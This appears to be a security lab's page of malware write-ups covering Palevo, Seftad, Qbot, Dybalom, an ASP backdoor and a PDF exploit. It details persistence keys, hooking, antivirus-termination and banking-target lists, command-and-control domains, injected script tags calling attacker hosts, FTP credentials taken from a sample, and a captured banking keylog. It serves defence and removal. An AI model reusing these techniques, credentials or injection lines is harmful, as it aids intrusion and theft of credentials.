[HKLM\SYSTEM\CurrentControlSet\Services\<Service Name>]

<Service Name> - a service name, it is passed to the library as a parameter when calling a function within the library.

Establishing a connection to the attacker's server, where IP-address and port are specified in a function call;
Changing a port number or IP-address to communicate with an attacker;
Saving and sending images from webcams and audio from a user's microphone to an attacker;
File Management (getting a list of files, sending files to an attacker, deleting and creating files and folders, renaming, data on file, covert or displayed to a user files opening, files changing)
Getting a list of processes;
Management of processes (tracking the names of processes, terminating processes);
Stealing passwords for dial-up connections;
Getting a list of windows on a user's computer;
Executing commands from the command line;
Passing an attacker information about a user's computer (information about a processor, a version of operating system, a list of logical drives);
Managing services (stop, start, delete, create, check availability, get information about the services, change startup parameters). The library also can change the executable service file by changing the following registry key:

[HKLM\SYSTEM\CurrentControlSet\Services\<Service Name>]

In addition, the library allows an attacker to send pictures of a user's desktop and receive commands from it to manipulate a mouse, thereby implementing a RAT functional (Remote Administration Tool);

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

P2P-Worm.Win32.Palevo.cvbu

Playrhyba — Sun, 12 Jun 2011 18:17:02 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Worm copies itself to local disks and accessible network resources. It is Windows (PE-EXE file) application. It is 623616 bytes in size. It is packed by unknown packer. The unpacked size is about 667 Kb. It is written in Delphi.

md5: D78C9132BCF1F000D92FBF8DED4295A7

sha1: 79000F6A22BA11D85B893738947EA3A45187B1A9

1 Installation
2 Payload
3 Propagation
4 Removal instruction

Installation

Once launched, the worm copies its body to a file:

%ALLUSERSPROFILE%\Application Data\srtserv\< original worm name>

To ensure that the copy created is launched automatically each time the system is rebooted, the following registry keys are created:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"srtserv" = "%ALLUSERSPROFILE%\Application Data\srtserv\<original worm name>"

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"srtserv" = "%ALLUSERSPROFILE%\Application Data\srtserv\<original worm name>"

Payload

The worm file’s icon is similar to the icon of Windows Explorer folder.

To control the uniqueness of its process the worm creates a unique identifier with the following names:

YCS0mRtQ316

The worm records a path to the original file and the ID of its process:

[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn] 
"value1" = "original malicious file’s name"
"value2" = "process PID"

After that, it extracts from its body and executes the following library:

%ALLUSERSPROFILE%\Application Data\srtserv\sdata.dll

This file is 23552 bytes in size and detected by Kaspersky antivirus as Trojan.Win32.Agent2.decp (md5:374F995DD3D9E5D293C98F0DDAB39618).

This file performs the following actions:

Creates a unique identifier with the name:

KAENA_HOOK

Injects a malicious code into all user processes;

The injected malicious code checks registry key values:

[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn]
"value1"
"value2"

After that hooks the following functions:

ZwQueryDirectoryFile 
ZwQuerySystemInformation 
ZwOpenProcess

The hooks allows the worm to hide a folder with a worm’s copy, malware file and process (a file name and an identifier of the process it gets out of a registry key).

To lock booting in Safe Mode, the worm deletes the contents of the following registry keys:

[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\NetWork]

It stops the service named "ShellHWDetection".

To implement a backdoor functional it connects to one of the following resources:

http://pu****11.comlu.com
http://de****63.110mb.com
http://v****rd.freehostia.com
http://s****nt-card.ru
http://el****t.ru
http://ps****bal.com
http://ps****gi.dk
http://p****ik.freehostia.com

when connection is successfully established the worm may perform the following actions:

1. loading its updated version, with the old malware file renaming by adding the extension ".bak", and then deleting it. The updated version is stored with the name "update.dat" in the following folder:

%ALLUSERSPROFILE%\Application Data\srtserv\update.dat

then renames and launches it for execution.

2. loading a configuration file that may contain references to both malicious resources and the resources to "cheat" rating, while the data is stored in the following file:

%ALLUSERSPROFILE%\Application Data\srtserv\setx.txt

3. the worm contains strings for the utility "Multi Password Recovery", in particular for the hidden launch of this tool and its further use.

The main functionality of this utility is to decrypt passwords for many popular applications (FTP, E-mail clients, Instant messengers, browsers, etc.).

4. downloading other malicious programs and running them for execution.

Propagation

The worm copies its body to all writable network and removable drives connected to the infected computer:

<name of an infected partition>:\<original malicious file’s name>

Together with its copy of the worm puts in the root directory of an infected disk file:

<name of an infected partition>:\autorun.inf

This file is 289 bytes in size and designed to automatically activate the worm when an infected disk is being opening using Explorer.

The attributes "read only", "hidden" and "system" are set to the file.

In addition, the worm copies itself to the names of directories on removable drives, adding to them ".exe" extension:

<name of an infected partition >:\<folder name on a removable disk>.exe

In this case, the attributes "read only", "hidden", "system" are set to the folders as well.

Removal instruction

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Using Kaspersky Rescue Disk 10 (download Kaspersky Rescue Disk) delete the folder and its content:

%ALLUSERSPROFILE%\Application Data\srtserv

2. Boot in a normal mode.

3. Delete the registry keys in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"srtserv" = "%ALLUSERSPROFILE%\Application Data\srtserv\< original malware name >"

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"srtserv" = "%ALLUSERSPROFILE%\Application Data\srtserv\<original malware name>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\MSrtn]
"value1" = "original malicious file name"
"value2" = "PID process"

4. Clear the Temporary Internet Files directory, which may contain infected files.

5. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-Ransom.Boot.Seftad.a

Volodymyr Obrizan — Fri, 10 Jun 2011 16:11:09 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a trojan that disables a personal computer in order to obtain a ransom for re-enabling. It is Windows application (PE-EXE files). It is 49,664 bytes in size. It is writer in C++.

Payload

Right after the start, the trojan appends a special code to the Main Boot Record of Microsoft Windows. Then, the trojan restart the system.

Thus, during the boot, the user will see the following message:

Your PC is blocked.
All the hard drives were encrypted.
Browse www.safe-data.ru to get an access to your system and files.
Any attempt to restore the drives using other way will
lead to inevitable data loss !!!
Please remember Your ID: 773921,
with its help your sign-on password will be generated. Enter password:

The user is asked to pay a ransom via a website in order to get the code to decrypt data on hard-drives. Actually, the trojan doesn’t encrypt data, it blocks proper boot-up only.

Removal Instructions

If your computer wasn’t protected with an antivirus program and was infected with this malicious program, perform the following actions to remove it:

Enter the password: aaaaaaciip. The trojan will restore original Master Boot Record.
Perform full system scan with an antivirus program.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan.Win32.Agent.nbcc

Playrhyba — Sun, 05 Jun 2011 22:47:12 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Trojan program that performs malicious activities in the user’s system. It is a Windows (PE64 DLL-file). It is 83968 bytes in size. It is written in C++.

Installation

Installation in the system and creating the initial conditions to run this trojan performed by other malicious programs.

Payload

The program terminates its execution, if an account name, under which it is running, is different from:

SYSTEM

The trojan allows access to the infected system and has a number of commands to manipulate (search, create, move, delete) files and folders, downloading and running files, terminating the processes and logging out of the system.

The Trojan also creates a SOCKS5 proxy server on any port. A notification of infection the trojan sends to an address that is stored in encrypted form in the registry key:

[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
"WbemAdapCode"

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Reboot a computer in a “Safe Mode” (at the beginning of system boot, press and hold the «F8», then select the «Safe Mode» the Windows boot menu).

2. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

3. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Backdoor.ASP.Ace.jd

Playrhyba — Sun, 29 May 2011 20:57:19 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The program is designed for testing a web server running on the user's computer for vulnerabilities, as well as stealing confidential information. It is HTML-page that uses ASP (Active Server Pages) technology, contains Java Script scenarios, and Visual Basic Script. It is 140205 bytes in size.

md5: CD3CF4FC6E5404010F0D089FB6628A04

sha1: 829D6EBE574A1894D42BDEB0F0F24913CD366D86

Payload

The program consists of a set of backdoors using different vulnerabilities to access a user's computer, as well as to obtain confidential information. It is designed to test a web server on a user’s computer.

Once launched, the program displays a window with different settings where it is possible to select one of the following items:

1. login

2. PageList

3. objOnSrv

4. ServiceList

5. userList

6. CSInfo

7. infoAboutSrv

8. AppFileExplorer

9. WsCmdRun

10. FsoFileExplorer

11. OtherTools

12. TxtSearcher

13. PageAddToMdb

At the same time it is necessary to select the first item and enter the password "SPMSPM".

Then a user can perform the following actions and receive the following information about a web server.

1. Function for enter the password.

2. Displaying a list of functions that can be used with this program;

3. Displaying information about the components available on a web server;

4. Receiving information about services that are running on a user’s computer (a service name, a path, a description, startup parameters, a status, a type of service) using Password Never Expires (WinNT Provider);

5. Displaying information about computer accounts (a user name, a password, an account type, a date of last login, etc.)

6. Displaying data from containers Application, Session and Cookie web server;

7. Obtaining information about a web server:

a server name;
IP address of a server;
a used port;
HTTP software used on a server;
a full path to a server;
current server time;
a number of processors;
information about a processor and operating system.

Information about logic drives of a web server:

a volume name;
a type of file system;
an amount of free space;
total space;
a type of logical drive.

Information about a folder where web server’s files are located:

a size;
a size of directories and subdirectories;
a creation date;
a last access date;

Information about a server of terminals:

a port number used by default for all new terminals created by a server;
if automatic log on is used on a user’s computer, it gets a user name and password by reading the following system registry key:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultUserName" 
"DefaultPassword"

8. Using objects "adodb.stream" and "Shell.Application":

reading and saving contents of files with a URL, referred by the user;
appending a user input;
downloading and storing files with a URL, referred by a user;
copying and moving files and directories;
renaming files and directories;
displaying attributes of files or folders, and setting attributes (hidden, system, read only, archive, without attributes, the data are not available, temporary, compressed state file, encrypted file, sparse file attribute);
sending files to an address specified by a user;
modifying contents of files;

9. Executing commands using a command line (cmd.exe);

10. Using Scripting.FileSystemObject ActiveX component:

creating files;
editing or displaying contents of files;
appending a user input;
accessing resources introduced by a user;
copying and moving files and directories;
renaming files;
deleting files;
displaying attributes of files or directories, and setting attributes (hidden, system, read only, archive, without attributes, data are not available, temporary, compressed file, encrypted file, sparse file);
performing file uploads or sending files using an object "adodb.stream", downloading or sending locations specified by a user.

11. Using "Microsoft.XMLHTTP" the ActiveX object to perform file downloading and saving it on a computer using the object "ADODB.Stream". A downloading link and a saving name is specified by a user.

12. Using Password Never Expires (WinNT Provider) to create a user's computer account of the type "Administrator". An account name and a password are specified by a user.

13. Showing contents of registry keys entered by a user.

14. Searching files containing a typed text;

If an action execution is failed or information is not obtained, a program displays error messages.

15. Checking a possibility of using "ADODB.RecordSet", "ADODB.Stream", "ADODB.Connection" and "ADOX.Catalog" to create a database on a server that stores the file "idTop.mdb". Also the trojan examines a possibility of recording data in a database.

In case of action fail, it displays a corresponding error.

In addition, the trojan checks for an opportunity to work with databases:

displaying a list of database tables;
editing a table;
deleting a table contents;
editing a table field;
saving a table field;
deleting fields in a table;
displaying a list of records;
editing records;
adding a record;
updating a record;
deleting a record;
displaying a list of stored procedures;
editing stored procedures;
deleting stored procedures;
displaying information about SQL view in a current database;
modifying existed SQL view;
displaying information about SQL view in a current database, pointing at what tables they are based - on local or remote ones;
deleting SQL view of a current database;
displaying information about a current database;
sending a variety of SQL queries.

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Clear the Temporary Internet Files directory, which may contain infected files.

3. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-PSW.Win32.Qbot.dkg

Playrhyba — Sat, 21 May 2011 23:33:02 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

Backdoor, designed to steal confidential user data. It is a Windows (PE-EXE file). It is 331,424 bytes in size. It is packed with PE_Patch, as well as an unknown packer. The unpacked file is about 205 KB in size. It is written in C++.

MD5: 8CACA118667B608EB4735AF3B229A546

SHA1: 0B78B4CA846A7F35DC55B13D8AF8767749A97793

Installation

Once launched, the backdoor copies its body to a file:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe

where <rnd_1> - is a random name (for example: "uiouy").

To start the created copy automatically each time the system starts it appends a path to the backdoor copy to a registry value found in the branch:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]

For example:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
<app name> = ""%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe" /c <old value>"

Also the key is created:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd_2>" = "%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe"

where <rnd_2> - is a random name (for example: "jladjtrq").

If you the keys cannot be created in the aforementioned branch, these actions will be performed in the branches:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

Then the backdoor extracts from its body the following files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll (154784 bytes; detected by Kaspersky Antivirus as "Trojan-Spy.Win32.Banker.qpl")

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll (453 байта)

where <rnd_3> -are first 4 characters of the name <rnd_1>.

The library "<rnd_1>" implements the main backdoor functionality and will be discussed below. The file "<rnd_3>. dll" contains encrypted information to configure further malware work. The file contained the following lines for analyzed sample:

cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://b***01.in/cgi-bin/ls1.pl
ftphost_1=216.***.214.95:cpanel@silfersystem.com:Pomidoro777:
ftphost_2=72.***.86.119:cpanel@gemini.com.co:Columbus101:
ftphost_3=66.***.30.219:cpanel@falahuddarain.com:Alladin71:
ftphost_4=110.***.45.64:cpanel@karnadya.com.my:Islam1120:
ftphost_5=74.***.215.107:cpanel@incitylocal.com:pieceacake100:
update_conf_ver=904

During the work, the backdoor writes generated data to the configuration file, as well as some collected information. For example:

alias__qbot.cb=uiou.dll
alias__qbotinj.exe=uiouy.exe
alias__qbot.dll=uiouy.dll
alias_si.txt=larvsox
home_dir=c:\documents and settings\all users\application data\microsoft\uiouy
irc_my_nick=vwnfjq298080
install_time=21.04.00-16/05/2011
firststart_test=1

In this case, the date and installation time (parameter "install_time") are analyzed. If the backdoor is installed later than "May 5 2011-12:46:11", then upgrading of its components is started. To do this, a connection to the host is established:

bg***t.in

and the following HTTP-request is sent:

POST /5 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTbPSI/5.11.3.15590)
Host: bg***t.in
Content-Length: 65
Cache-Control: no-cache
is=3&ec1=0&ec2=0&it=2&b=679&vt=0&ov=<OS version>&n=<value of parameter irc_my_nick>

At the time of writing, the server did not respond.

During installation, the backdoor collects the following information about the system: - a user name;

- a computer name;

- a key value in the registry:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"ProductId"

- a serial number of a system drive;

- a list of installed software on the infected computer. To do this, it reads the values "ProductName" in the registry branch:

[HKCR\Installer\Products\...]

- IP-address of the infected computer. To determine the IP-address the following resources are used:

http://www.ipaddressworld.com/
http://www.ip-adress.com

To control the uniqueness of its process in the system the backdoor creates a unique identifier with the name:

<name of backdoor file>a<user name>

Upon completion of installation, the malware executes a previously created copy:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe

and deletes its original file. To do this, an executable code is embedded into an address space of the system process "EXPLORER.EXE" that runs firstly a copy, and then the system shell "CMD.EXE" with parameters:

cmd /c ping -n 10 localhost && del "<full path to the original backdoor file>"

At this point the installation process is completed.

The malicious program can be run with the following parameters:

/t – the message WM_QUIT is sent to a created by the malware window "<rnd_1> <username>". Then the malware process is terminated.

/s – the malware is run as a Windows service.

/i – only extracting of files is performed:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll

after that the malware ends its execution.

Payload

Once launched, the backdoor finds in its working directory library extracted during the installation, and call the function with the name "kIlsasgcbag0a". This sets a hook-procedure for tracking messages in the system queue. This allows the trojan to perform the following actions:

hide files "<rnd_1>. exe", "<rnd_1>. dll" in its working directory;
hide its own working directory;
hide its own process in Task Manager;
hide created during the installation keys in the system registry;
keep track of user activity of the infected computer (keystrokes, file access, network traffic, etc.). The information obtained is recorded in the file:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll

where <rnd_4> - are the first 3 letters of the name <rnd_1>.

Below is a part of the log created by malicious programs when a user tries to login at "http://www.sovereignbank.com":

t=kb time=[23:46:56-17/5/2011] p=[iexplore.exe] b=[http://www.sovereignbank.com/]
t=u1 time=[23:47:35-17/5/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:47:35-17/5/2011] url=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] data=[done=yes&referback=%2Futils%2Fnet_banking_logon.asp&accountType=personal&state=NY] referer=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] cookie=[ACE-WEBCOOKIE-WWW=R364677618; ASPSESSIONIDQASSQDSD=IEFPNFBBDAFAACFKIHCLOKMF; s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520forms%252520/%252520regional_prefs.asp%2526pidt%253D1%2526oid%253Djavascript%25253AcheckSubmit%252528%252529%25253B%2526ot%253DA%2526oi%253D215; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.1.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)]
t=kb time=[23:48:27-17/5/2011] p=[iexplore.exe] b=[MyUserID]
t=h2 time=[23:48:27-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/rsafso.do] data=[fp_browser=mozilla%2F4.0+%28compatible%3B+msie+6.0%3B+windows+nt+5.1%3B+sv1%29%7C4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%29%7CWin32%7C%3BSP2%3B%7Cx86%7Cru%7C8820&fp_screen=32%7C1920%7C1080%7C1050&fp_software=abk%3D6%2C0%2C2600%2C0%7Cwnt%3D6%2C0%2C2900%2C2180%7Cdht%3D5%2C5000%2C3130%2C0%7Cdhj%3D6%2C0%2C1%2C223%7Cdan%3D6%2C0%2C3%2C531%7Cdsh%3D9%2C0%2C0%2C3250%7Cie5%3D6%2C0%2C2900%2C2180%7Cicw%3D5%2C0%2C2918%2C1900%7Cieh%3D6%2C0%2C2900%2C2180%7Ciee%3D4%2C74%2C9273%2C0%7Cwmp%3D9%2C0%2C0%2C3250%7Cobp%3D6%2C0%2C2900%2C2180%7Coex%3D6%2C0%2C2900%2C2180%7Cnet%3D4%2C4%2C0%2C3400%7Ctks%3D4%2C71%2C1968%2C1%7Cmvm%3D5%2C0%2C5000%2C0&fp_timezone=4&fp_language=lang%3Dru%7Csyslang%3Dru%7Cuserlang%3Dru&fp_java=1&fp_cookie=1&username=MyUserID&x=8&y=8] referer=[https://olb.sovereignbank.com/sovSSA/gitLogonSovbank.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=h2 time=[23:48:32-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/getfso] data=[pmdata=] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=kb time=[23:48:51-17/5/2011] p=[iexplore.exe] b=[MyPassword]
t=h2 time=[23:48:51-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/enrollpwdverf.do] data=[password=MyPassword&x=7&y=9] referer=[https://olb.sovereignbank.com/sovSSA/rsaLogon.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38;

Also the considered library exports a function called "zupidshc21mnu", designed to remove the hook.

The backdoor in a cycle tracing launch of the following processes:

iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe
msmsgs.exe

If the process is found, a malicious library will be injected into its address space.

The considered library implements functionality that allows, depending on the received commands from the attacker, to perform on the infected computer the following actions:

terminates processes:

msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe

terminates running in the system services and processes which names contain the substrings:

webroot.
agnitum
ahnlab
arcabit
avast
avg
avira
avp
bitdefender
bit9
castlecops
centralcommand
clamav
comodo
computerassociates
cpsecure
defender
drweb
emsisoft
esafe
.eset
etrust
ewido
fortinet
f-prot
f-secure
gdata
grisoft
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
networkassociates
nod32
norman
norton
panda
pctools
prevx
quickheal
rising
rootkit
securecomputing
sophos
spamhaus
spyware
sunbelt
symantec
threatexpert
trendmicro
virus
wilderssecurity
windowsupdate

finds and modify files with the extensions:

.inc
.php
.htm
.asp
.pl
.cfm

infects web pages on user’s FTP and HTTP server user by adding links to malicious scripts into pages:

<script src="http://in***ate.info/3"></script>
<script src=http://in***ate.info/3></script>
<script src="http://pr***t.in/3"></script>
<script src=http://pr***t.in/3></script>

downloads files by the received from attacker links, saving them in the folder:

%WinDir%\TEMP

works with files on the specified FTP-servers.
updates its components, downloading updates from the attacker’s servers.
controls processes and services.
steals confidential user information when accessing the resources with the names that contain the substrings:

iris.sovereignbank.com
/wires/
paylinks.cunet.org
securentrycorp.amegybank.com
businessbankingcenter.synovus.com
businessinternetbanking.synovus.com
ocm.suntrust.com
cashproonline.bankofamerica.com
singlepoint.usbank.com
netconnect.bokf.com
business-eb.ibanking-services.com
cashproonline.bankofamerica.com
/cashplus/
ebanking-services.com
/cashman/
web-cashplus.com
treas-mgt.frostbank.com
business-eb.ibanking-services.com
treasury.pncbank.com
access.jpmorgan.com
tssportal.jpmorgan.com
ktt.key.com
onlineserv/CM
premierview.membersunited.org
directline4biz.com
.webcashmgmt.com
tmconnectweb
moneymanagergps.com
ibc.klikbca.com
directpay.wellsfargo.com
express.53.com
itreasury.regions.com
itreasurypr.regions.com
cpw-achweb.bankofamerica.com
businessaccess.citibank.citigroup.com
businessonline.huntington.com
/cmserver/
goldleafach.com
ub-businessonline.blilk.com
iachwellsprod.wellsfargo.com
achbatchlisting
/achupload
commercial3.wachovia.com
wc.wachovia.com
commercial.wachovia.com
wcp.wachovia.com
chsec.wellsfargo.com
wellsoffice.wellsfargo.com
/stbcorp/
/payments/ach
trz.tranzact.org
/wiret
/payments/ach
cbs.firstcitizensonline.com
/corpach/

steals passwords stored in the browser Internet Explorer. To do this, an analysis of registry keys is performed in the branch:

[HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2]

steals account information from Outlook Express. To do this, an analysis of registry keys is performed in the branch:

[HKCU\Software\Microsoft\Internet Account Manager\Accounts]

sends an information collected on the infected computer to the specified server.

While running the backdoor connects to the following servers:

re***rver.com.ua
pp***g.in
du**.in
du**.in
yi**.com.ua
cit***omo.info
last***t.co.in

The connection log is stored by backdoor into the file:

c:\irclog.txt

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Reboot a computer in a “Safe Mode” (at the beginning of system boot, press and hold the «F8», then select the «Safe Mode» the Windows boot menu).

2. Delete the registry keys and restore original values of the keys in system registry:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

3. Delete files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll
c:\irclog.txt

4. Delete downloaded files in the folder:

%WinDir%\TEMP

5. Clear the Temporary Internet Files directory, which may contain infected files.

6. Change the authentication data for the compromised resources.

7. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-PSW.Win32.Dybalom.ggk

Playrhyba — Sat, 14 May 2011 22:02:57 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The trojan belongs to the family that steals user passwords. It is a Windows application (PE EXE-file). Its size is 348,360 bytes. It is packed using MoleBox. Its unpacked size is about 368 KB. It is written in C++.

MD5: 1CF38EA970C8EBDCA48DB1B349CF234B

SHA1: B4B8E60112516B6886994E4D0DFD45D3659619FF

Payload

Once launched, the trojan reads a configuration file from resources. Then, accordingly to the read settings, it performs actions shown below.

The trojan has anti-debugging and anti-dynamic analysis protection. The trojan exits if windows with the following classes are observed:

PROCMON_WINDOW_CLASS
gdkWindowToplevel

The trojan steals personal data and account information of the following applications and services:

Microsoft Passport.Net
Google Talk
Trillian
Pidgin
Paltalk
Steam Valve
No-Ip Duc
DynDNS
Mozilla Firefox
Internet Explorer 7/8
Google Chrome
Opera
Internet Download Manager
FileZilla
FlashFXP
SmartFTP
CuteFTP Lite
CuteFTP Home
CuteFTP Pro

The trojan sends stolen data to the following URL:

http://www.ma****kings.com

At the moment of writing, the link didn’t work.

After this, the trojan terminates.

Also, the trojan creates the file:

%WorkDir%\<trojan-filename>-up.txt

It contains a log file produced by the program protecting the trojan.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Delete the file:

%WorkDir%\<trojan-filename>-up.txt

3. Change password for compromised accounts.

4. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Exploit.JS.Pdfka.dna

Playrhyba — Sat, 07 May 2011 14:30:11 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

This exploit program uses vulnerabilities in Adobe Reader and Acrobat to execute itself on the user's computer. It is a PDF document containing XML Forms Architecture and Java Script. It is 26,393 bytes in size.

MD5: 66A58A3AAF2F7AAECA3D95AB86E0BA28

SHA1: 008112C3EE4F6FD21433027C7A3E4E9543B3BB46

Payload

Initialization and execution of the malicious payload is done on opening of an infected PDF document containing an XFA form. An obfuscated malicious Java Script is used as a handler of the “initialize” event in the XFA form. After removing of obfuscation, the malicious script exploits the CVE-2010-0188 vulnerability in Adobe Reader with a purpose to download the following file:

http://fi****ld.info/1TF19pd

This file is stored in the following location:

%Temp%\<rnd>.exe

here <rnd> – random Latin characters.

The malware then launches the downloaded file for execution. At the time of writing, these links were inactive. Adobe Reader and Acrobat 8 (up to version 8.2.1) and 9 (up to 9.3.1) are vulnerable to this exploit.

Removal Instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Delete the original exploit file (its location will depend on how the program originally penetrated the infected computer).

2. Delete the downloaded malicious file:

%Temp%\<rnd>.exe

3. Update Adobe Reader and Acrobat or install updates using the link:

http://www.adobe.com/support/security/bulletins/apsb10-07.html

4. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Exploit.Win32.CVE-2010-2568.z

